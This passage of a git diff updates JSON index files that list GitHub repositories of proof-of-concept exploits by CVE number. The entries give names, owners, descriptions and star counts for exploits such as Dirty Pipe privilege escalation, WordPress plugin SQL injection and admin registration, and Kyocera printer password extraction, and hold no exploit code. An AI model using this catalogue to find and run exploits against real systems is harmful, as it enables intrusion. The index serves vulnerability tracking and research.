+ "created_at": "2023-06-08T21:20:22Z",
+ "updated_at": "2023-06-09T07:40:58Z",
+ "pushed_at": "2023-06-08T21:26:58Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 2,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 2,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 2
+ }
+]
\ No newline at end of file
diff --git a/2022/CVE-2022-0441.json b/2022/CVE-2022-0441.json
index 09b6f3dca4..02ca0e33fa 100644
--- a/2022/CVE-2022-0441.json
+++ b/2022/CVE-2022-0441.json
@@ -65,6 +65,40 @@
"score": 0,
"subscribers_count": 1
},
+ {
+ "id": 648445645,
+ "name": "CVE-2022-0441",
+ "full_name": "tegal1337\/CVE-2022-0441",
+ "owner": {
+ "login": "tegal1337",
+ "id": 58784189,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/58784189?v=4",
+ "html_url": "https:\/\/github.com\/tegal1337"
+ },
+ "html_url": "https:\/\/github.com\/tegal1337\/CVE-2022-0441",
+ "description": "The MasterStudy LMS WordPress plugin before 2.7.6 does to validate some parameters given when registering a new account, allowing unauthenticated users to register as an admin",
+ "fork": false,
+ "created_at": "2023-06-02T01:53:32Z",
+ "updated_at": "2023-09-28T11:46:20Z",
+ "pushed_at": "2023-06-02T02:24:56Z",
+ "stargazers_count": 2,
+ "watchers_count": 2,
+ "has_discussions": false,
+ "forks_count": 2,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "cve-2022-0441",
+ "wordpress-exploit",
+ "wordpress-plugin"
+ ],
+ "visibility": "public",
+ "forks": 2,
+ "watchers": 2,
+ "score": 0,
+ "subscribers_count": 1
+ },
{
"id": 699704500,
"name": "CVE-2022-0441",
diff --git a/2022/CVE-2022-0492.json b/2022/CVE-2022-0492.json
index 7528fc3f66..49fc5503cc 100644
--- a/2022/CVE-2022-0492.json
+++ b/2022/CVE-2022-0492.json
@@ -178,5 +178,42 @@
"watchers": 2,
"score": 0,
"subscribers_count": 1
+ },
+ {
+ "id": 603301567,
+ "name": "CVE-2022-0492-Docker-Breakout-Checker-and-PoC",
+ "full_name": "T1erno\/CVE-2022-0492-Docker-Breakout-Checker-and-PoC",
+ "owner": {
+ "login": "T1erno",
+ "id": 78065668,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/78065668?v=4",
+ "html_url": "https:\/\/github.com\/T1erno"
+ },
+ "html_url": "https:\/\/github.com\/T1erno\/CVE-2022-0492-Docker-Breakout-Checker-and-PoC",
+ "description": "Docker Breakout Checker and PoC via CAP_SYS_ADMIN and via user namespaces (CVE-2022-0492)",
+ "fork": false,
+ "created_at": "2023-02-18T04:48:25Z",
+ "updated_at": "2024-03-24T09:39:48Z",
+ "pushed_at": "2023-02-18T05:28:02Z",
+ "stargazers_count": 2,
+ "watchers_count": 2,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "cve",
+ "cve-2022-0492",
+ "docker-breakout",
+ "hacking",
+ "pentesting",
+ "privesc"
+ ],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 2,
+ "score": 0,
+ "subscribers_count": 1
}
]
\ No newline at end of file
diff --git a/2022/CVE-2022-0543.json b/2022/CVE-2022-0543.json
index c586bd33ce..eb10246d3a 100644
--- a/2022/CVE-2022-0543.json
+++ b/2022/CVE-2022-0543.json
@@ -88,5 +88,35 @@
"watchers": 8,
"score": 0,
"subscribers_count": 1
+ },
+ {
+ "id": 638780954,
+ "name": "redisHack",
+ "full_name": "SiennaSkies\/redisHack",
+ "owner": {
+ "login": "SiennaSkies",
+ "id": 105592340,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/105592340?v=4",
+ "html_url": "https:\/\/github.com\/SiennaSkies"
+ },
+ "html_url": "https:\/\/github.com\/SiennaSkies\/redisHack",
+ "description": "redis未授权、redis_CVE-2022-0543检测利用二合一脚本",
+ "fork": false,
+ "created_at": "2023-05-10T05:05:31Z",
+ "updated_at": "2023-05-23T14:22:20Z",
+ "pushed_at": "2023-05-11T09:23:28Z",
+ "stargazers_count": 3,
+ "watchers_count": 3,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 3,
+ "score": 0,
+ "subscribers_count": 1
}
]
\ No newline at end of file
diff --git a/2022/CVE-2022-0739.json b/2022/CVE-2022-0739.json
index 2e7abe0b33..ba76afa937 100644
--- a/2022/CVE-2022-0739.json
+++ b/2022/CVE-2022-0739.json
@@ -153,5 +153,95 @@
"watchers": 0,
"score": 0,
"subscribers_count": 1
+ },
+ {
+ "id": 586035039,
+ "name": "CVE-2022-0739",
+ "full_name": "viardant\/CVE-2022-0739",
+ "owner": {
+ "login": "viardant",
+ "id": 84291326,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/84291326?v=4",
+ "html_url": "https:\/\/github.com\/viardant"
+ },
+ "html_url": "https:\/\/github.com\/viardant\/CVE-2022-0739",
+ "description": "Exploit for WP BookingPress (< 1.0.11) based on destr4ct POC.",
+ "fork": false,
+ "created_at": "2023-01-06T19:07:11Z",
+ "updated_at": "2024-04-15T17:24:43Z",
+ "pushed_at": "2023-01-17T16:02:48Z",
+ "stargazers_count": 3,
+ "watchers_count": 3,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 3,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 603458874,
+ "name": "CVE-2022-0739",
+ "full_name": "ElGanz0\/CVE-2022-0739",
+ "owner": {
+ "login": "ElGanz0",
+ "id": 103381132,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/103381132?v=4",
+ "html_url": "https:\/\/github.com\/ElGanz0"
+ },
+ "html_url": "https:\/\/github.com\/ElGanz0\/CVE-2022-0739",
+ "description": "BookingPress < 1.0.11 - Unauthenticated SQL Injection",
+ "fork": false,
+ "created_at": "2023-02-18T15:23:49Z",
+ "updated_at": "2023-02-18T15:24:59Z",
+ "pushed_at": "2023-02-23T21:49:01Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 616018302,
+ "name": "Bash-exploit-for-CVE-2022-0739",
+ "full_name": "lhamouche\/Bash-exploit-for-CVE-2022-0739",
+ "owner": {
+ "login": "lhamouche",
+ "id": 125658579,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/125658579?v=4",
+ "html_url": "https:\/\/github.com\/lhamouche"
+ },
+ "html_url": "https:\/\/github.com\/lhamouche\/Bash-exploit-for-CVE-2022-0739",
+ "description": null,
+ "fork": false,
+ "created_at": "2023-03-19T11:35:03Z",
+ "updated_at": "2023-09-18T18:30:15Z",
+ "pushed_at": "2023-03-23T08:20:51Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
}
]
\ No newline at end of file
diff --git a/2022/CVE-2022-0847.json b/2022/CVE-2022-0847.json
index 5979893d76..d7e076b46b 100644
--- a/2022/CVE-2022-0847.json
+++ b/2022/CVE-2022-0847.json
@@ -1185,10 +1185,10 @@
"description": "A collection of exploits and documentation that can be used to exploit the Linux Dirty Pipe vulnerability.",
"fork": false,
"created_at": "2022-03-12T20:57:24Z",
- "updated_at": "2024-06-25T10:23:00Z",
+ "updated_at": "2024-06-26T06:11:45Z",
"pushed_at": "2023-05-20T05:55:45Z",
- "stargazers_count": 515,
- "watchers_count": 515,
+ "stargazers_count": 516,
+ "watchers_count": 516,
"has_discussions": false,
"forks_count": 138,
"allow_forking": true,
@@ -1197,7 +1197,7 @@
"topics": [],
"visibility": "public",
"forks": 138,
- "watchers": 515,
+ "watchers": 516,
"score": 0,
"subscribers_count": 15
},
@@ -2320,6 +2320,36 @@
"score": 0,
"subscribers_count": 1
},
+ {
+ "id": 585137919,
+ "name": "Dirty-Pipe-CVE-2022-0847-POCs",
+ "full_name": "ajith737\/Dirty-Pipe-CVE-2022-0847-POCs",
+ "owner": {
+ "login": "ajith737",
+ "id": 72512571,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/72512571?v=4",
+ "html_url": "https:\/\/github.com\/ajith737"
+ },
+ "html_url": "https:\/\/github.com\/ajith737\/Dirty-Pipe-CVE-2022-0847-POCs",
+ "description": null,
+ "fork": false,
+ "created_at": "2023-01-04T12:17:12Z",
+ "updated_at": "2023-01-04T12:17:19Z",
+ "pushed_at": "2023-01-04T12:51:32Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 2,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 2,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
{
"id": 592661297,
"name": "CVE-2022-0847",
@@ -2350,6 +2380,126 @@
"score": 0,
"subscribers_count": 1
},
+ {
+ "id": 606665321,
+ "name": "CVE-2022-0847-DirtyPipe-Exploits",
+ "full_name": "orsuprasad\/CVE-2022-0847-DirtyPipe-Exploits",
+ "owner": {
+ "login": "orsuprasad",
+ "id": 96675141,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/96675141?v=4",
+ "html_url": "https:\/\/github.com\/orsuprasad"
+ },
+ "html_url": "https:\/\/github.com\/orsuprasad\/CVE-2022-0847-DirtyPipe-Exploits",
+ "description": null,
+ "fork": false,
+ "created_at": "2023-02-26T07:08:36Z",
+ "updated_at": "2023-02-26T07:09:46Z",
+ "pushed_at": "2023-02-26T07:09:43Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 632960690,
+ "name": "CVE-2022-0847-container-escape",
+ "full_name": "JlSakuya\/CVE-2022-0847-container-escape",
+ "owner": {
+ "login": "JlSakuya",
+ "id": 43692131,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/43692131?v=4",
+ "html_url": "https:\/\/github.com\/JlSakuya"
+ },
+ "html_url": "https:\/\/github.com\/JlSakuya\/CVE-2022-0847-container-escape",
+ "description": "A simple exploit that uses dirtypipe to inject shellcode into runC entrypoint to implement container escapes.",
+ "fork": false,
+ "created_at": "2023-04-26T13:37:14Z",
+ "updated_at": "2023-04-29T08:25:41Z",
+ "pushed_at": "2023-04-26T13:38:38Z",
+ "stargazers_count": 2,
+ "watchers_count": 2,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 2,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 634694393,
+ "name": "cve-2022-0847",
+ "full_name": "jonathanbest7\/cve-2022-0847",
+ "owner": {
+ "login": "jonathanbest7",
+ "id": 91819614,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/91819614?v=4",
+ "html_url": "https:\/\/github.com\/jonathanbest7"
+ },
+ "html_url": "https:\/\/github.com\/jonathanbest7\/cve-2022-0847",
+ "description": "check cve-2022-0847",
+ "fork": false,
+ "created_at": "2023-04-30T23:52:14Z",
+ "updated_at": "2023-04-30T23:52:15Z",
+ "pushed_at": "2023-04-30T23:52:15Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 656422987,
+ "name": "dirty-pipe-poc",
+ "full_name": "0xeremus\/dirty-pipe-poc",
+ "owner": {
+ "login": "0xeremus",
+ "id": 115777776,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/115777776?v=4",
+ "html_url": "https:\/\/github.com\/0xeremus"
+ },
+ "html_url": "https:\/\/github.com\/0xeremus\/dirty-pipe-poc",
+ "description": "POC Exploit to add user to Sudo for CVE-2022-0847 Dirty Pipe Vulnerability",
+ "fork": false,
+ "created_at": "2023-06-20T23:48:24Z",
+ "updated_at": "2023-11-30T12:04:32Z",
+ "pushed_at": "2023-06-20T23:48:52Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ },
{
"id": 662828842,
"name": "CVE-2022-0847-eBPF",
diff --git a/2022/CVE-2022-0995.json b/2022/CVE-2022-0995.json
index 87c0db35e8..af14c5b7b4 100644
--- a/2022/CVE-2022-0995.json
+++ b/2022/CVE-2022-0995.json
@@ -29,6 +29,36 @@
"score": 0,
"subscribers_count": 8
},
+ {
+ "id": 612087603,
+ "name": "CVE-2022-0995",
+ "full_name": "AndreevSemen\/CVE-2022-0995",
+ "owner": {
+ "login": "AndreevSemen",
+ "id": 43631421,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/43631421?v=4",
+ "html_url": "https:\/\/github.com\/AndreevSemen"
+ },
+ "html_url": "https:\/\/github.com\/AndreevSemen\/CVE-2022-0995",
+ "description": "Реализация средств повышения привилегий в Linux",
+ "fork": false,
+ "created_at": "2023-03-10T07:05:45Z",
+ "updated_at": "2023-03-11T02:46:18Z",
+ "pushed_at": "2023-03-10T11:29:22Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 2
+ },
{
"id": 738494648,
"name": "CVE-2022-0995",
diff --git a/2022/CVE-2022-1011.json b/2022/CVE-2022-1011.json
new file mode 100644
index 0000000000..bff25a43ef
--- /dev/null
+++ b/2022/CVE-2022-1011.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 654390552,
+ "name": "CVE-2022-1011",
+ "full_name": "xkaneiki\/CVE-2022-1011",
+ "owner": {
+ "login": "xkaneiki",
+ "id": 26479696,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/26479696?v=4",
+ "html_url": "https:\/\/github.com\/xkaneiki"
+ },
+ "html_url": "https:\/\/github.com\/xkaneiki\/CVE-2022-1011",
+ "description": "这个漏洞感觉只能信息泄露?",
+ "fork": false,
+ "created_at": "2023-06-16T03:02:38Z",
+ "updated_at": "2024-02-21T03:54:26Z",
+ "pushed_at": "2023-06-16T04:13:42Z",
+ "stargazers_count": 8,
+ "watchers_count": 8,
+ "has_discussions": false,
+ "forks_count": 2,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 2,
+ "watchers": 8,
+ "score": 0,
+ "subscribers_count": 2
+ }
+]
\ No newline at end of file
diff --git a/2022/CVE-2022-1015.json b/2022/CVE-2022-1015.json
index b08bd04460..b75f790b77 100644
--- a/2022/CVE-2022-1015.json
+++ b/2022/CVE-2022-1015.json
@@ -119,6 +119,96 @@
"score": 0,
"subscribers_count": 3
},
+ {
+ "id": 600659828,
+ "name": "CVE-2022-1015",
+ "full_name": "wlswotmd\/CVE-2022-1015",
+ "owner": {
+ "login": "wlswotmd",
+ "id": 80761172,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/80761172?v=4",
+ "html_url": "https:\/\/github.com\/wlswotmd"
+ },
+ "html_url": "https:\/\/github.com\/wlswotmd\/CVE-2022-1015",
+ "description": null,
+ "fork": false,
+ "created_at": "2023-02-12T07:06:40Z",
+ "updated_at": "2023-02-12T07:09:56Z",
+ "pushed_at": "2023-04-26T09:40:17Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 610271922,
+ "name": "CVE-2022-1015",
+ "full_name": "delsploit\/CVE-2022-1015",
+ "owner": {
+ "login": "delsploit",
+ "id": 127108998,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/127108998?v=4",
+ "html_url": "https:\/\/github.com\/delsploit"
+ },
+ "html_url": "https:\/\/github.com\/delsploit\/CVE-2022-1015",
+ "description": null,
+ "fork": false,
+ "created_at": "2023-03-06T12:50:43Z",
+ "updated_at": "2023-03-06T12:51:55Z",
+ "pushed_at": "2023-03-06T12:51:50Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 617380197,
+ "name": "CVE-2022-1015",
+ "full_name": "pivik271\/CVE-2022-1015",
+ "owner": {
+ "login": "pivik271",
+ "id": 82135340,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/82135340?v=4",
+ "html_url": "https:\/\/github.com\/pivik271"
+ },
+ "html_url": "https:\/\/github.com\/pivik271\/CVE-2022-1015",
+ "description": null,
+ "fork": false,
+ "created_at": "2023-03-22T09:16:58Z",
+ "updated_at": "2023-04-25T01:05:15Z",
+ "pushed_at": "2023-03-22T09:20:24Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ },
{
"id": 675264070,
"name": "CVE-2022-1015",
diff --git a/2022/CVE-2022-1026.json b/2022/CVE-2022-1026.json
index 18f37121b8..91d1cab839 100644
--- a/2022/CVE-2022-1026.json
+++ b/2022/CVE-2022-1026.json
@@ -1,4 +1,34 @@
[
+ {
+ "id": 614407734,
+ "name": "kyocera-cve-2022-1026",
+ "full_name": "ac3lives\/kyocera-cve-2022-1026",
+ "owner": {
+ "login": "ac3lives",
+ "id": 26721330,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/26721330?v=4",
+ "html_url": "https:\/\/github.com\/ac3lives"
+ },
+ "html_url": "https:\/\/github.com\/ac3lives\/kyocera-cve-2022-1026",
+ "description": "An unauthenticated data extraction vulnerability in Kyocera printers, which allows for recovery of cleartext address book and domain joined passwords",
+ "fork": false,
+ "created_at": "2023-03-15T14:23:41Z",
+ "updated_at": "2024-03-06T13:19:17Z",
+ "pushed_at": "2023-03-15T14:33:48Z",
+ "stargazers_count": 6,
+ "watchers_count": 6,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 6,
+ "score": 0,
+ "subscribers_count": 2
+ },
{
"id": 666781357,
"name": "nmap-printer-nse-scripts",
diff --git a/2022/CVE-2022-10270.json b/2022/CVE-2022-10270.json
new file mode 100644
index 0000000000..142b2f5b2b
--- /dev/null
+++ b/2022/CVE-2022-10270.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 587225929,
+ "name": "sunflower_exp",
+ "full_name": "baimaobg\/sunflower_exp",
+ "owner": {
+ "login": "baimaobg",
+ "id": 110097762,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/110097762?v=4",
+ "html_url": "https:\/\/github.com\/baimaobg"
+ },
+ "html_url": "https:\/\/github.com\/baimaobg\/sunflower_exp",
+ "description": "Sunflower CVE-2022-10270 vulnerability exploitation tool",
+ "fork": false,
+ "created_at": "2023-01-10T08:56:15Z",
+ "updated_at": "2023-09-28T11:44:42Z",
+ "pushed_at": "2023-01-10T10:27:53Z",
+ "stargazers_count": 3,
+ "watchers_count": 3,
+ "has_discussions": false,
+ "forks_count": 3,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 3,
+ "watchers": 3,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2022/CVE-2022-1040.json b/2022/CVE-2022-1040.json
index fa3968391d..c9190bfb35 100644
--- a/2022/CVE-2022-1040.json
+++ b/2022/CVE-2022-1040.json
@@ -119,6 +119,36 @@
"score": 0,
"subscribers_count": 0
},
+ {
+ "id": 586568152,
+ "name": "CVE-2022-1040",
+ "full_name": "michealadams30\/CVE-2022-1040",
+ "owner": {
+ "login": "michealadams30",
+ "id": 113975732,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/113975732?v=4",
+ "html_url": "https:\/\/github.com\/michealadams30"
+ },
+ "html_url": "https:\/\/github.com\/michealadams30\/CVE-2022-1040",
+ "description": "Sophos EXploit",
+ "fork": false,
+ "created_at": "2023-01-08T15:46:00Z",
+ "updated_at": "2023-01-08T15:46:00Z",
+ "pushed_at": "2023-01-08T15:48:19Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
{
"id": 696656893,
"name": "CVE-2022-1040",
diff --git a/2022/CVE-2022-1227.json b/2022/CVE-2022-1227.json
new file mode 100644
index 0000000000..117060e55c
--- /dev/null
+++ b/2022/CVE-2022-1227.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 622123920,
+ "name": "CVE-2022-1227_Exploit",
+ "full_name": "iridium-soda\/CVE-2022-1227_Exploit",
+ "owner": {
+ "login": "iridium-soda",
+ "id": 32727642,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/32727642?v=4",
+ "html_url": "https:\/\/github.com\/iridium-soda"
+ },
+ "html_url": "https:\/\/github.com\/iridium-soda\/CVE-2022-1227_Exploit",
+ "description": "A script for exploiting CVE-2022-1227",
+ "fork": false,
+ "created_at": "2023-04-01T07:28:15Z",
+ "updated_at": "2024-06-20T08:23:31Z",
+ "pushed_at": "2023-04-13T12:36:27Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2022/CVE-2022-1329.json b/2022/CVE-2022-1329.json
index 36a0ee9828..a904afced5 100644
--- a/2022/CVE-2022-1329.json
+++ b/2022/CVE-2022-1329.json
@@ -95,6 +95,36 @@
"score": 0,
"subscribers_count": 1
},
+ {
+ "id": 594762176,
+ "name": "CVE-2022-1329",
+ "full_name": "dexit\/CVE-2022-1329",
+ "owner": {
+ "login": "dexit",
+ "id": 6205151,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/6205151?v=4",
+ "html_url": "https:\/\/github.com\/dexit"
+ },
+ "html_url": "https:\/\/github.com\/dexit\/CVE-2022-1329",
+ "description": "The Elementor Website Builder plugin for WordPress is vulnerable to unauthorized execution of several AJAX actions due to a missing capability check in the ~\/core\/app\/modules\/onboarding\/module.php file that make it possible for attackers to modify site data in addition to uploading malicious files that can be used to o CVE project by @Sn0wAlice",
+ "fork": false,
+ "created_at": "2023-01-29T15:13:34Z",
+ "updated_at": "2023-02-20T12:39:20Z",
+ "pushed_at": "2022-12-28T12:11:47Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
{
"id": 818198561,
"name": "CVE-2022-1329",
diff --git a/2022/CVE-2022-1386.json b/2022/CVE-2022-1386.json
index f50590b304..30f34382df 100644
--- a/2022/CVE-2022-1386.json
+++ b/2022/CVE-2022-1386.json
@@ -1,4 +1,71 @@
[
+ {
+ "id": 607455905,
+ "name": "CVE-2022-1386",
+ "full_name": "ardzz\/CVE-2022-1386",
+ "owner": {
+ "login": "ardzz",
+ "id": 38525912,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/38525912?v=4",
+ "html_url": "https:\/\/github.com\/ardzz"
+ },
+ "html_url": "https:\/\/github.com\/ardzz\/CVE-2022-1386",
+ "description": null,
+ "fork": false,
+ "created_at": "2023-02-28T02:08:59Z",
+ "updated_at": "2024-05-14T07:12:51Z",
+ "pushed_at": "2023-03-09T16:25:57Z",
+ "stargazers_count": 7,
+ "watchers_count": 7,
+ "has_discussions": false,
+ "forks_count": 3,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 3,
+ "watchers": 7,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 609709956,
+ "name": "fubucker",
+ "full_name": "im-hanzou\/fubucker",
+ "owner": {
+ "login": "im-hanzou",
+ "id": 61415393,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/61415393?v=4",
+ "html_url": "https:\/\/github.com\/im-hanzou"
+ },
+ "html_url": "https:\/\/github.com\/im-hanzou\/fubucker",
+ "description": "Automatic Mass Tool for checking vulnerability in CVE-2022-1386 - Fusion Builder < 3.6.2 - Unauthenticated SSRF",
+ "fork": false,
+ "created_at": "2023-03-05T01:46:41Z",
+ "updated_at": "2024-06-04T12:12:38Z",
+ "pushed_at": "2023-03-08T18:25:29Z",
+ "stargazers_count": 5,
+ "watchers_count": 5,
+ "has_discussions": false,
+ "forks_count": 2,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "avada",
+ "checker",
+ "cve-2022-1386",
+ "fusion-builder",
+ "theme-fusion",
+ "wordpress"
+ ],
+ "visibility": "public",
+ "forks": 2,
+ "watchers": 5,
+ "score": 0,
+ "subscribers_count": 1
+ },
{
"id": 697749113,
"name": "CVE-2022-1386-Mass_Vulnerability",
diff --git a/2022/CVE-2022-1388.json b/2022/CVE-2022-1388.json
index 1bcc6a47b4..4282e52574 100644
--- a/2022/CVE-2022-1388.json
+++ b/2022/CVE-2022-1388.json
@@ -623,10 +623,10 @@
"description": "CVE-2022-1388 is an authentication bypass vulnerability in the REST component of BIG-IP’s iControl API that was assigned a CVSSv3 score of 9.8. The iControl REST API is used for the management and configuration of BIG-IP devices. CVE-2022-1388 could be exploited by an unauthenticated attacker with network access to the management port or self IP addresses of devices that use BIG-IP. Exploitation would allow the attacker to execute arbitrary system commands, create and delete files and disable services.",
"fork": false,
"created_at": "2022-05-10T04:10:46Z",
- "updated_at": "2023-10-21T05:24:43Z",
+ "updated_at": "2024-06-26T05:28:41Z",
"pushed_at": "2022-05-12T17:06:29Z",
- "stargazers_count": 6,
- "watchers_count": 6,
+ "stargazers_count": 7,
+ "watchers_count": 7,
"has_discussions": false,
"forks_count": 0,
"allow_forking": true,
@@ -643,7 +643,7 @@
],
"visibility": "public",
"forks": 0,
- "watchers": 6,
+ "watchers": 7,
"score": 0,
"subscribers_count": 1
},
@@ -1779,6 +1779,39 @@
"score": 0,
"subscribers_count": 1
},
+ {
+ "id": 627124485,
+ "name": "tippa-my-tongue",
+ "full_name": "j-baines\/tippa-my-tongue",
+ "owner": {
+ "login": "j-baines",
+ "id": 113205286,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/113205286?v=4",
+ "html_url": "https:\/\/github.com\/j-baines"
+ },
+ "html_url": "https:\/\/github.com\/j-baines\/tippa-my-tongue",
+ "description": "F5 BIG-IP Exploit Using CVE-2022-1388 and CVE-2022-41800",
+ "fork": false,
+ "created_at": "2023-04-12T20:46:03Z",
+ "updated_at": "2023-04-14T17:24:44Z",
+ "pushed_at": "2023-04-12T21:03:44Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "cve-2022-1388",
+ "cve-2022-41800"
+ ],
+ "visibility": "public",
